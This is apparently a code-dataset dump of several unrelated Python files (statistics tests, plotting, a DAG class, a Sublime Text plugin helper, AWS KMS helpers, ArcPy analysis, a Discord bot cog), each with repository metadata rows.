def test_block_length():
rs = np.random.RandomState(0)
e = rs.standard_normal(10000 + 100)
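    # 100 extra draws serve as burn-in (dropped below) so the AR(1) series starts
    # near its stationary distribution; note that y aliases e, so the recursion
    # updates the array in place (e[i] is read before it is overwritten)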
y = e
for i in range(1, len(e)):
y[i] = 0.3 * y[i - 1] + e[i]
s = pd.Series(y[100:], name="x")
bl = optimal_block_length(s)
sb, cb = bl.loc["x"]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
df = pd.DataFrame([s, s]).T
df.columns = ["x", "y"]
bl = optimal_block_length(df)
for idx in ("x", "y"):
sb, cb = bl.loc[idx]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
assert tuple(bl.columns) == ("stationary", "circular")
assert tuple(bl.index) == ("x", "y")
bl = optimal_block_length(np.asarray(df))
assert tuple(bl.index) == (0, 1)
| 28.333333 | 58 | 0.610695 | 154 | 935 | 3.603896 | 0.38961 | 0.126126 | 0.12973 | 0.108108 | 0.299099 | 0.299099 | 0.21982 | 0.21982 | 0.21982 | 0.21982 | 0 | 0.077241 | 0.224599 | 935 | 32 | 59 | 29.21875 | 0.688276 | 0 | 0 | 0.153846 | 0 | 0 | 0.027807 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 1 | 0.038462 | false | 0 | 0.153846 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3fc69ae17afb4191989d8ffd0210a58f43c6b8b | 2,836 | py | Python | articles/imp/genfigs/bulldozer_age_pdp_shap.py | parrt/stratx | c190ecc32ac7b8dd3f5532a5d5b0de34a3693a22 | [
"MIT"
] | 54 | 2019-07-17T04:59:39.000Z | 2022-03-18T15:25:00.000Z | articles/imp/genfigs/bulldozer_age_pdp_shap.py | parrt/stratx | c190ecc32ac7b8dd3f5532a5d5b0de34a3693a22 | [
"MIT"
] | 5 | 2019-07-27T16:18:37.000Z | 2020-12-02T20:16:49.000Z | articles/imp/genfigs/bulldozer_age_pdp_shap.py | parrt/stratx | c190ecc32ac7b8dd3f5532a5d5b0de34a3693a22 | [
"MIT"
] | 13 | 2019-08-08T22:17:50.000Z | 2022-02-11T10:19:23.000Z | from support import *
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import shap
GREY = '#444443'
n = 20_000
shap_test_size = 1000
X, y = load_bulldozer(n=50_000)
# The most recent time-series data is more relevant, so take a big recent chunk
# and then sample n rows from it
X = X.iloc[-50_000:]
y = y.iloc[-50_000:]
idxs = resample(range(50_000), n_samples=n, replace=False)
X_, y_ = X.iloc[idxs], y.iloc[idxs]
fig, ax = plt.subplots(1, 1, figsize=(3.8, 3.2))
ax.scatter(X_['age'], y_, s=3, alpha=.1, c='#1E88E5')
ax.set_xlabel("age\n(a)", fontsize=13)
ax.set_ylabel("SalePrice ($)", fontsize=13)
ax.set_title("Marginal plot", fontsize=13)
ax.spines['left'].set_linewidth(.5)
ax.spines['bottom'].set_linewidth(.5)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
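# note: Spine.set_smart_bounds() was deprecated in Matplotlib 3.2 and removed in
# 3.4, so the spine styling in this script requires an older Matplotlib release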
ax.spines['left'].set_smart_bounds(True)
ax.spines['bottom'].set_smart_bounds(True)
plt.tight_layout()
plt.savefig("../images/bulldozer-age-marginal.pdf", bbox_inches="tight", pad_inches=0)
plt.show()
rf = RandomForestRegressor(n_estimators=40, n_jobs=-1)
rf.fit(X_, y_)
explainer = shap.TreeExplainer(rf, data=shap.sample(X_, 100),
feature_perturbation='interventional')
shap_values = explainer.shap_values(X.sample(n=shap_test_size),
check_additivity=False)
fig, ax = plt.subplots(1, 1, figsize=(3.8, 3.2))
shap.dependence_plot("age", shap_values, X_.sample(n=shap_test_size),
interaction_index=None, ax=ax, dot_size=5,
show=False, alpha=.5)
ax.spines['left'].set_linewidth(.5)
ax.spines['bottom'].set_linewidth(.5)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['left'].set_smart_bounds(True)
ax.spines['bottom'].set_smart_bounds(True)
ax.set_ylabel("Impact on SalePrice\n(age SHAP)")
ax.set_xlabel("age\n(b)")
ax.tick_params(axis='both', which='major', labelsize=10)
plt.tight_layout()
plt.savefig("../images/bulldozer-age-shap.pdf", bbox_inches="tight", pad_inches=0)
plt.show()
# Now show StratPD
fig, ax = plt.subplots(1, 1, figsize=(3.8, 3.2))
plot_stratpd(X_, y_, colname='age', targetname='SalePrice',
show_slope_lines=False,
show_impact=False,
label_fontsize=13,
figsize=(3.8,3.2),
ax=ax
)
ax.spines['left'].set_linewidth(.5)
ax.spines['bottom'].set_linewidth(.5)
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['left'].set_smart_bounds(True)
ax.spines['bottom'].set_smart_bounds(True)
ax.set_ylabel("SalePrice ($)", fontsize=13)
ax.set_xlabel("age\n(c)", fontsize=13)
ax.tick_params(axis='both', which='major', labelsize=11)
plt.tight_layout()
plt.savefig("../images/bulldozer-age-stratpd.pdf", bbox_inches="tight", pad_inches=0)
plt.show() | 31.511111 | 86 | 0.681946 | 453 | 2,836 | 4.092715 | 0.293598 | 0.07767 | 0.033981 | 0.048544 | 0.581446 | 0.559871 | 0.55178 | 0.55178 | 0.377562 | 0.320928 | 0 | 0.039328 | 0.139281 | 2,836 | 90 | 87 | 31.511111 | 0.720197 | 0.043371 | 0 | 0.42029 | 0 | 0 | 0.141697 | 0.038007 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.072464 | 0 | 0.072464 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b6025c07a550e6b64ea088e2d2ae6f07c65add55 | 2,154 | py | Python | congregation/dag/dag.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 3 | 2020-10-05T16:30:15.000Z | 2021-01-22T13:38:02.000Z | congregation/dag/dag.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | null | null | null | congregation/dag/dag.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 1 | 2021-02-19T12:40:57.000Z | 2021-02-19T12:40:57.000Z | from congregation.dag.nodes import OpNode
class Dag:
def __init__(self, roots: set):
self.roots = roots
def __str__(self):
return "\n".join(str(node) for node in self.top_sort())
def involves_compute_party(self, pid: int):
"""
For a given PID, check if it owns any
data associated with this DAG
"""
for r in self.roots:
for sw_set in r.out_rel.stored_with:
if pid in sw_set:
return True
return False
def dfs_visit(self, visitor):
visited = set()
for root in self.roots:
self._dfs_visit(root, visitor, visited)
return visited
def _dfs_visit(self, node: OpNode, visitor, visited: set):
visitor(node)
visited.add(node)
for child in node.children:
if child not in visited:
self._dfs_visit(child, visitor, visited)
def dfs_print(self):
self.dfs_visit(print)
def get_all_nodes(self):
return self.dfs_visit(lambda node: node)
def top_sort(self):
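        # Standard DFS-based topological sort: `temp_marked` tracks nodes on the
        # current DFS path (used for cycle detection) and `marked` tracks nodes
        # whose descendants are fully processed.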
unmarked = sorted(list(self.get_all_nodes()), key=lambda x: x.out_rel.name)
marked = set()
temp_marked = set()
ordered = []
while unmarked:
node = unmarked.pop()
self._top_sort_visit(node, marked, temp_marked, unmarked, ordered)
return ordered
def _top_sort_visit(self, node: OpNode, marked: set, temp_marked: set, unmarked: [list, set], ordered: list):
if node in temp_marked:
raise Exception(f"Cycle detected in graph, not a dag: Node {node} was in {temp_marked}.")
if node not in marked:
if node in unmarked:
unmarked.remove(node)
temp_marked.add(node)
children = sorted(list(node.children), key=lambda x: x.out_rel.name)
for other_node in children:
self._top_sort_visit(other_node, marked, temp_marked, unmarked, ordered)
marked.add(node)
unmarked.append(node)
temp_marked.remove(node)
ordered.insert(0, node)
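# Illustrative usage (node names are hypothetical; roots must be OpNode
# instances from congregation.dag.nodes):
#   dag = Dag(roots={create_node, aggregate_node})
#   for node in dag.top_sort():
#       process(node)  # nodes arrive in dependency order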
| 28.342105 | 113 | 0.587744 | 281 | 2,154 | 4.323843 | 0.284698 | 0.065844 | 0.039506 | 0.024691 | 0.128395 | 0.092181 | 0.034568 | 0 | 0 | 0 | 0 | 0.000684 | 0.321727 | 2,154 | 75 | 114 | 28.72 | 0.830938 | 0.031105 | 0 | 0 | 0 | 0 | 0.03455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18 | false | 0 | 0.02 | 0.04 | 0.34 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b602707d9d2d61f75e1f77871a6e22ddd13d0a1e | 8,940 | py | Python | package_control/package_disabler_iterator.py | evandrocoan/package_control | bb17c851fa2dee0e564128ea4a499087f2d2ec45 | [
"MIT"
] | 2 | 2018-12-08T21:44:59.000Z | 2021-11-27T05:14:02.000Z | package_control/package_disabler_iterator.py | evandrocoan/package_control | bb17c851fa2dee0e564128ea4a499087f2d2ec45 | [
"MIT"
] | 3 | 2018-02-09T04:14:30.000Z | 2018-10-08T14:40:36.000Z | package_control/package_disabler_iterator.py | evandrocoan/package_control | bb17c851fa2dee0e564128ea4a499087f2d2ec45 | [
"MIT"
] | null | null | null |
import sublime
import time
import functools
from .settings import run_on_main_thread
from .package_disabler import PackageDisabler
# How many packages to ignore and unignore per batch to work around the ignored packages bug
PACKAGES_COUNT_TO_IGNORE_AHEAD = 8
# The minimum time between multiple calls setting the `ignored_packages` setting, without triggering
# the Sublime Text error `It appears a package is trying to ignore itself, causing a loop`
IGNORE_PACKAGE_MINIMUM_WAIT_TIME = 3.7
g_next_packages_to_ignore = []
g_default_ignored_packages = []
def sublime_settings():
settings_name = "Preferences.sublime-settings"
return sublime.load_settings( settings_name )
def save_sublime_settings():
settings_name = "Preferences.sublime-settings"
sublime.save_settings( settings_name )
def packagesmanager_settings():
settings_name = "PackagesManager.sublime-settings"
return sublime.load_settings( settings_name )
def save_packagesmanager_settings():
settings_name = "PackagesManager.sublime-settings"
sublime.save_settings( settings_name )
def unique_list_append(a_list, *lists):
for _list in lists:
for item in _list:
if item not in a_list:
a_list.append( item )
def save_ignored_packages_callback():
packagesmanager_settings().set( 'next_packages_to_ignore', g_next_packages_to_ignore )
save_packagesmanager_settings()
def clean_ignored_packages_callback():
packagesmanager_settings().erase( 'next_packages_to_ignore' )
save_packagesmanager_settings()
class IgnoredPackagesBugFixer(object):
_is_running = False
def __init__(self, package_list_to_process, ignoring_type="install"):
assert not IgnoredPackagesBugFixer._is_running, "IgnoredPackagesBugFixer is a Singleton and it is already running! Did you forget to stop it?"
IgnoredPackagesBugFixer._is_running = True
self.package_list_to_process = package_list_to_process
self.package_disabler = PackageDisabler()
self.uningored_packages_to_flush = 0
# Value to pass to Package Control PackageDisabler:
# - "upgrade"
# - "remove"
# - "install"
# - "disable"
# - "loader"
self.ignoring_type = ignoring_type
global g_default_ignored_packages
global g_next_packages_to_ignore
g_next_packages_to_ignore = packagesmanager_settings().get( 'next_packages_to_ignore', [] )
g_default_ignored_packages = self.setup_packages_ignored_list( packages_to_remove=g_next_packages_to_ignore )
def __iter__(self):
package_list_to_process = self.package_list_to_process
for package_name in package_list_to_process:
self.ignore_next_packages( package_name, package_list_to_process )
# To here, you can do anything with your package on `package_name` variable, because
# the functions ignore_next_packages() and accumulative_unignore_user_packages()
# will take care of everything to ensure they are disabled and reenabled.
yield package_name
self.accumulative_unignore_user_packages( package_name )
# Ensure the list is clean when process finishes
self.stop()
def stop(self):
"""
        If the iteration is stopped by a break statement, this must be called before the break.
"""
self.accumulative_unignore_user_packages( flush_everything=True )
run_on_main_thread( clean_ignored_packages_callback )
IgnoredPackagesBugFixer._is_running = False
def skip_reenable(self, package_name):
if package_name in g_next_packages_to_ignore:
g_next_packages_to_ignore.remove( package_name )
else:
print( "PackagesManager: The package `%s` is not marked to be unignored." % package_name )
def ignore_next_packages(self, package_name, packages_list):
if self.uningored_packages_to_flush < 1:
global g_next_packages_to_ignore
last_ignored_packages = packages_list.index( package_name )
g_next_packages_to_ignore.extend( packages_list[last_ignored_packages : last_ignored_packages+PACKAGES_COUNT_TO_IGNORE_AHEAD+1] )
            # If a package is already in the user's `ignored_packages` setting, it was disabled by
            # the user, therefore we must not re-enable it later when unignoring the others.
            for next_package in list( g_next_packages_to_ignore ):
                if next_package in g_default_ignored_packages:
                    print( "PackagesManager: Warning, the package `%s` is skipped because it is already ignored." % next_package )
                    g_next_packages_to_ignore.remove( next_package )
g_next_packages_to_ignore.sort()
            # Let the packages be unloaded by Sublime Text while ensuring no one puts them back in
self.setup_packages_ignored_list( packages_to_add=g_next_packages_to_ignore )
def accumulative_unignore_user_packages(self, package_name="", flush_everything=False):
"""
@param flush_everything set all remaining packages as unignored
"""
if flush_everything:
self.setup_packages_ignored_list( packages_to_remove=g_next_packages_to_ignore )
self.clear_next_ignored_packages()
else:
print( "PackagesManager: Adding package to unignore list: %s" % str( package_name ) )
self.uningored_packages_to_flush += 1
if self.uningored_packages_to_flush >= len( g_next_packages_to_ignore ):
self.setup_packages_ignored_list( packages_to_remove=g_next_packages_to_ignore )
self.clear_next_ignored_packages()
def clear_next_ignored_packages(self):
del g_next_packages_to_ignore[:]
self.uningored_packages_to_flush = 0
    def setup_packages_ignored_list(self, packages_to_add=None, packages_to_remove=None):
        """
        Flush just a few items each time. Let the packages be unloaded by Sublime Text while
        ensuring no one puts them back in.
        Works around the `ignored_packages` setting randomly reverting on batch operations:
        https://github.com/SublimeTextIssues/Core/issues/2132
        """
        # avoid mutable default arguments; the lists are sorted in place below
        packages_to_add = packages_to_add if packages_to_add is not None else []
        packages_to_remove = packages_to_remove if packages_to_remove is not None else []
        currently_ignored = sublime_settings().get( "ignored_packages", [] )
        packages_to_add.sort()
        packages_to_remove.sort()
print( "PackagesManager: Currently ignored packages: " + str( currently_ignored ) )
print( "PackagesManager: Ignoring the packages: " + str( packages_to_add ) )
print( "PackagesManager: Unignoring the packages: " + str( packages_to_remove ) )
currently_ignored = [package_name for package_name in currently_ignored if package_name not in packages_to_remove]
unique_list_append( currently_ignored, packages_to_add )
currently_ignored.sort()
# This adds them to the `in_process` list on the Package Control.sublime-settings file
if len( packages_to_add ):
# We use a functools.partial to generate the on-complete callback in
# order to bind the current value of the parameters, unlike lambdas.
closure = functools.partial( self.package_disabler.disable_packages, list(packages_to_add), self.ignoring_type )
run_on_main_thread( closure )
time.sleep( IGNORE_PACKAGE_MINIMUM_WAIT_TIME )
# This should remove them from the `in_process` list on the Package Control.sublime-settings file
if len( packages_to_remove ):
# We use a functools.partial to generate the on-complete callback in
# order to bind the current value of the parameters, unlike lambdas.
closure = functools.partial( self.package_disabler.reenable_package, list(packages_to_remove), self.ignoring_type )
run_on_main_thread( closure )
time.sleep( IGNORE_PACKAGE_MINIMUM_WAIT_TIME )
def main_callback():
sublime_settings().set( "ignored_packages", currently_ignored )
save_sublime_settings()
        # Something, somewhere keeps setting the ignored_packages list back to `["Vintage"]`,
        # so keep re-applying our value until it sticks.
        for _ in range( 0, 27 ):
run_on_main_thread( main_callback )
time.sleep( IGNORE_PACKAGE_MINIMUM_WAIT_TIME )
new_ignored_list = sublime_settings().get( "ignored_packages", [] )
print( "PackagesManager: Currently ignored packages: " + str( new_ignored_list ) )
if new_ignored_list:
if len( new_ignored_list ) == len( currently_ignored ) \
and new_ignored_list == currently_ignored:
break
run_on_main_thread( save_ignored_packages_callback )
return currently_ignored
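# Illustrative usage (the package names and the `upgrade`/`should_abort`
# callables are hypothetical):
#   for package_name in IgnoredPackagesBugFixer(["PackageA", "PackageB"], "upgrade"):
#       upgrade(package_name)  # runs while the package is ignored/disabled
# When breaking out early, stop the fixer first so packages are re-enabled:
#   fixer = IgnoredPackagesBugFixer(packages_list, "remove")
#   for package_name in fixer:
#       if should_abort():
#           fixer.stop()
#           break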
| 40.821918 | 150 | 0.702908 | 1,103 | 8,940 | 5.349048 | 0.197643 | 0.071186 | 0.056949 | 0.067797 | 0.469153 | 0.384576 | 0.315593 | 0.249661 | 0.209153 | 0.202203 | 0 | 0.002193 | 0.234899 | 8,940 | 218 | 151 | 41.009174 | 0.86038 | 0.21443 | 0 | 0.230769 | 0 | 0 | 0.105087 | 0.030814 | 0 | 0 | 0 | 0 | 0.008547 | 1 | 0.136752 | false | 0 | 0.042735 | 0 | 0.222222 | 0.059829 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b604ed726ad0c27b4c9c8cb853054f3c1f6e34f0 | 1,125 | py | Python | djenga/encryption/kms.py | 2ps/djenga | 85ac2c7b0b0e80b55aff43f027814d05b9b0532c | [
"BSD-3-Clause"
] | 6 | 2015-01-18T10:31:13.000Z | 2019-06-14T17:39:58.000Z | djenga/encryption/kms.py | 2ps/djenga | 85ac2c7b0b0e80b55aff43f027814d05b9b0532c | [
"BSD-3-Clause"
] | 12 | 2015-05-03T06:58:00.000Z | 2019-06-26T21:58:16.000Z | djenga/encryption/kms.py | 2ps/djenga | 85ac2c7b0b0e80b55aff43f027814d05b9b0532c | [
"BSD-3-Clause"
] | 1 | 2018-04-27T20:36:29.000Z | 2018-04-27T20:36:29.000Z | from .helpers import _as_bytes
from .helpers import b64_str
from .helpers import from_b64_str
from .helpers import _get_client
from .helpers import _prefix_alias
def encrypt_bytes(
plain_text: bytes
, alias: str
, region: str = None
, profile: str = None) -> bytes:
client = _get_client(region, profile)
alias = _prefix_alias(alias)
data = client.encrypt(KeyId=alias, Plaintext=plain_text)
return data['CiphertextBlob']
def decrypt_bytes(
cipher_text: bytes
, region: str = None
, profile: str = None) -> bytes:
client = _get_client(region, profile)
data = client.decrypt(CiphertextBlob=cipher_text)
return data['Plaintext']
def encrypt(plain_text, alias, region: str = None, profile: str = None) -> str:
plain_text = _as_bytes(plain_text)
data = encrypt_bytes(plain_text, alias, region, profile)
return b64_str(data)
def decrypt(cipher_text: str, region: str = None, profile: str = None):
cipher_text = from_b64_str(cipher_text)
data = decrypt_bytes(cipher_text, region, profile)
return data.decode('utf-8')
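# Example round trip (illustrative; the alias, region, and profile are
# hypothetical and must exist in your AWS account):
#   token = encrypt("secret value", "my-app-key", region="us-east-1")
#   assert decrypt(token, region="us-east-1") == "secret value"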
| 29.605263 | 79 | 0.691556 | 148 | 1,125 | 5.013514 | 0.189189 | 0.075472 | 0.114555 | 0.107817 | 0.304582 | 0.242588 | 0.206199 | 0.161725 | 0.161725 | 0.161725 | 0 | 0.010147 | 0.211556 | 1,125 | 37 | 80 | 30.405405 | 0.826381 | 0 | 0 | 0.206897 | 0 | 0 | 0.024889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.172414 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b6067da1a3d8144b0aacdb78ebe92f0d1ae4957c | 3,275 | py | Python | Testing/intersection_densityTEST.py | djconly85/PPA2_0_code | 1d67934eb3bc3c7df16cdd5867639b92c9ea45eb | [
"MIT"
] | null | null | null | Testing/intersection_densityTEST.py | djconly85/PPA2_0_code | 1d67934eb3bc3c7df16cdd5867639b92c9ea45eb | [
"MIT"
] | null | null | null | Testing/intersection_densityTEST.py | djconly85/PPA2_0_code | 1d67934eb3bc3c7df16cdd5867639b92c9ea45eb | [
"MIT"
] | null | null | null | # --------------------------------
# Name: intersection_densityTEST.py
# Purpose: Compute intersection density (intersections per acre) around a project
#
#
# Author: Darren Conly
# Last Updated: <date>
# Updated by: <name>
# Copyright: (c) SACOG
# Python Version: 3.x
# --------------------------------
import gc
import sys
import arcpy
# import ppa_input_params as params
def trace():
import traceback, inspect
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
# script name + line number
line = tbinfo.split(", ")[1]
filename = inspect.getfile(inspect.currentframe())
# Get Python syntax error
synerror = traceback.format_exc().splitlines()[-1]
return line, filename, synerror
def get_poly_area(poly_fl):
buff_area_ft2 = 0
with arcpy.da.SearchCursor(poly_fl, ["SHAPE@AREA"]) as cur:
for row in cur:
buff_area_ft2 += row[0]
buff_acre = buff_area_ft2 / 43560 # convert from ft2 to acres. may need to adjust for projection-related issues. See PPA1 for more info
return buff_acre
def intersection_density(fc_project, fc_intersxns, project_type):
try:
arcpy.AddMessage("Calculating intersection density...")
fl_project = "fl_projline"
        fl_intersxns = "fl_intersxns"
if arcpy.Exists(fl_project): arcpy.Delete_management(fl_project)
arcpy.MakeFeatureLayer_management(fc_project, fl_project)
if arcpy.Exists(fl_intersxns): arcpy.Delete_management(fl_intersxns)
arcpy.MakeFeatureLayer_management(fc_intersxns, fl_intersxns)
# analysis area. If project is line or point, then it's a buffer around the line/point.
# If it's a polygon (e.g. ctype or region), then no buffer and analysis area is that within the input polygon
if project_type == "AGG":
fc_buff = fc_project
else:
buffdist = 1320 # feet
fc_buff = r"memory\temp_buff_qmi"
arcpy.Buffer_analysis(fl_project, fc_buff, buffdist)
fl_buff = "fl_buff"
if arcpy.Exists(fl_buff): arcpy.Delete_management(fl_buff)
arcpy.MakeFeatureLayer_management(fc_buff, fl_buff)
buff_acres = get_poly_area(fl_buff)
        # get count of intersections within the buffer
arcpy.SelectLayerByLocation_management(fl_intersxns, "INTERSECT", fl_buff, 0, "NEW_SELECTION")
intsxn_34 = 0
col_link_cnt = "LINKS"
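        # a node with more than 2 links is a true intersection (3+ legs)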
with arcpy.da.SearchCursor(fl_intersxns, [col_link_cnt]) as cur:
for row in cur:
if row[0] > 2:
intsxn_34 += 1
intersxns_per_acre = intsxn_34 / buff_acres if buff_acres > 0 else 0
arcpy.Delete_management(fl_intersxns)
gc.collect()
msg = "SUCCESS - intersections per acre: {}".format(intersxns_per_acre)
except:
msg = trace()
return msg
if __name__ == '__main__':
arcpy.env.workspace = r'I:\Projects\Darren\PPA_V2_GIS\ForESRI\Layers4ESRI_03172020.gdb'
proj_line_fc = arcpy.GetParameterAsText(0)
intersxns_fc = 'intersections_2016'
proj_type = "Line project"
output = intersection_density(proj_line_fc, intersxns_fc, proj_type)
arcpy.SetParameterAsText(1, output)
| 31.190476 | 140 | 0.643359 | 417 | 3,275 | 4.810552 | 0.386091 | 0.023928 | 0.041874 | 0.045862 | 0.047856 | 0.015952 | 0 | 0 | 0 | 0 | 0 | 0.0204 | 0.251603 | 3,275 | 104 | 141 | 31.490385 | 0.798042 | 0.205802 | 0 | 0.034483 | 0 | 0 | 0.100736 | 0.024022 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051724 | false | 0 | 0.068966 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60cc9c298430cfb0532fa24f8e831ee7ebc2637 | 308 | py | Python | utilities/extract-files.py | ukgamesfund/registry-blockchain | 73b12a36b7af5df3235f1b91939b8fd59b213b9f | [
"MIT"
] | null | null | null | utilities/extract-files.py | ukgamesfund/registry-blockchain | 73b12a36b7af5df3235f1b91939b8fd59b213b9f | [
"MIT"
] | null | null | null | utilities/extract-files.py | ukgamesfund/registry-blockchain | 73b12a36b7af5df3235f1b91939b8fd59b213b9f | [
"MIT"
] | null | null | null | import json,os,sys
filename = sys.argv[1]
file_path = "../build/contracts/" + filename
with open(file_path, "r") as f:
    contract = json.load(f)
abi = json.dumps(contract['abi'], indent=2)
# drop the leading "0x" from the unlinked bytecode
bytecode = contract['unlinked_binary'][2:]
with open(filename + ".abi", "w") as f:
    f.write(abi)
with open(filename + ".bin", "w") as f:
    f.write(bytecode)
| 22 | 42 | 0.681818 | 47 | 308 | 4.404255 | 0.553191 | 0.077295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010714 | 0.090909 | 308 | 13 | 43 | 23.692308 | 0.728571 | 0 | 0 | 0 | 0 | 0 | 0.156352 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60cefb60f76a4f016c09e520a3873524a38f0fc | 499 | py | Python | trinity/tests/test_bonds.py | elliothevel/trinity | af4425e6432f6edd7c56478b039eab654c5fec26 | [
"MIT"
] | null | null | null | trinity/tests/test_bonds.py | elliothevel/trinity | af4425e6432f6edd7c56478b039eab654c5fec26 | [
"MIT"
] | null | null | null | trinity/tests/test_bonds.py | elliothevel/trinity | af4425e6432f6edd7c56478b039eab654c5fec26 | [
"MIT"
] | null | null | null | import trinity.bonds as bonds
import trinity.returns as returns
def test_simulate_returns(expected_bond_returns):
"""Ensure simulated returns match published results."""
interest_rates = [(year['rate'], year['rate_long'])
for year in returns.read_shiller()]
simulated_returns = bonds.simulate_returns(interest_rates)
for simulated, expected in zip(simulated_returns, expected_bond_returns):
assert abs(simulated - expected['total_return']) < 0.0002
| 35.642857 | 77 | 0.727455 | 61 | 499 | 5.721311 | 0.508197 | 0.137536 | 0.108883 | 0.148997 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.178357 | 499 | 13 | 78 | 38.384615 | 0.839024 | 0.098196 | 0 | 0 | 0 | 0 | 0.056306 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60cff1aa58f85db479507a365921e43a1e5cf4d | 705 | py | Python | karutakeqingautoreact/karutakeqingautoreact.py | RealCyGuy/modmail-plugins | e515f827eb3fedf8456fbb5ff65a4e5fa81ab72e | [
"MIT"
] | 8 | 2020-01-03T19:01:59.000Z | 2021-04-14T13:30:49.000Z | karutakeqingautoreact/karutakeqingautoreact.py | RealCyGuy/modmail-plugins | e515f827eb3fedf8456fbb5ff65a4e5fa81ab72e | [
"MIT"
] | 4 | 2020-12-22T12:51:03.000Z | 2022-01-05T20:17:00.000Z | karutakeqingautoreact/karutakeqingautoreact.py | RealCyGuy/modmail-plugins | e515f827eb3fedf8456fbb5ff65a4e5fa81ab72e | [
"MIT"
] | 27 | 2020-01-17T18:05:29.000Z | 2022-02-04T07:38:52.000Z | import discord
from discord.ext import commands
class KarutaKeqingAutoReact(commands.Cog):
"""
Reacts to karuta character lookup and collection for keqing bot.
"""
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
        # react only to embeds posted by the Karuta bot (hard-coded bot user ID)
        if message.author.id == 646937666251915264 and message.embeds:
            embed = message.embeds[0]
            title = str(embed.title or "")  # embeds may lack a title
            if title.startswith("Card Collection"):
                await message.add_reaction("📝")
            elif title.startswith("Character Lookup"):
                await message.add_reaction("🖌️")
def setup(bot):
bot.add_cog(KarutaKeqingAutoReact(bot))
| 29.375 | 70 | 0.652482 | 81 | 705 | 5.617284 | 0.518519 | 0.048352 | 0.087912 | 0.101099 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035581 | 0.242553 | 705 | 23 | 71 | 30.652174 | 0.810861 | 0.09078 | 0 | 0 | 0 | 0 | 0.0544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
